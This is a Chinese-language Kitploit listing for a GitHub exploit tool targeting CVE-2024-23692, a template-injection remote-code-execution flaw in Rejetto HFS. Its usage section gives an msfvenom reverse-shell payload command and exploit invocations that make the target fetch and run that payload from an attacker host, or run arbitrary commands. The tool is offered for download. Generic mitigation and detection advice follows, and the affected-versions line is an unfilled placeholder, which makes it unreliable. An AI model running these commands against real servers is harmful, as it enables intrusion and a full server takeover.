Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-23692 — Rejetto HFS(HTTP 文件服务器)是一个简单的网络文件服务器,用于在网络或互联网上共享文件。 | Kitploit
工具/GitHubGitHub/mr-r00t11/cve-2024-23692
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试远程访问工具
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS(HTTP 文件服务器)是一个简单的网络文件服务器,用于在网络或互联网上共享文件。

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Rejetto HFS (HTTP文件服务器) CVE-2024-23692 漏洞


概述

Rejetto HFS(HTTP文件服务器)是一个简单的Web文件服务器,方便通过网络或互联网进行文件共享。尽管其易于使用且简单,但已发现一个严重漏洞(CVE-2024-23692),使该服务器成为攻击者的目标。


CVE-2024-23692:服务器端模板注入(SSTI)漏洞


描述

CVE-2024-23692 是 Rejetto HFS 中发现的服务器端模板注入(SSTI)漏洞。该漏洞允许攻击者在服务器上注入并执行恶意模板。如果被利用,可能导致远程代码执行,可能危及整个服务器及其托管的数据。


影响

攻击者利用此漏洞可以:

  • 在服务器上执行任意代码
  • 未经授权访问敏感数据
  • 破坏服务器的完整性和可用性
  • 利用被入侵的服务器在网络内发起进一步攻击

使用方法

使用 msfvenom 生成的恶意二进制文件获取 Shell。

注意:保持 nc 监听。

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

远程运行命令。

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

显示结果可能需要大约15秒。

[Screenshot_2.png]


受影响版本

所有版本的 Rejetto HFS,包括最高至[在此处插入最新受影响版本]的版本,都受此漏洞影响。


缓解措施

为减轻 CVE-2024-23692 带来的风险,建议用户:

  • 更新到最新版本: 确保您使用的是已修补此漏洞的 Rejetto HFS 版本。查看官方 Rejetto HFS 网站或仓库以获取最新更新。
  • 应用安全最佳实践: 仅允许可信网络和用户访问 HFS 服务器。使用强身份验证和授权机制。
  • 监控与审计: 定期监控服务器是否存在异常活动,并审计日志以查找利用迹象。

检测

要判断您的服务器是否已被入侵,请留意:

  • 来自服务器的异常网络流量
  • 服务器上出现意外文件或进程
  • 对服务器配置或数据的未经授权更改

报告与帮助

如需进一步帮助和支持,请参考 Rejetto HFS 社区论坛或官方支持渠道。


资源

  • Rejetto HFS 官方网站
  • CVE-2024-23692 详情

许可

本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。


下载工具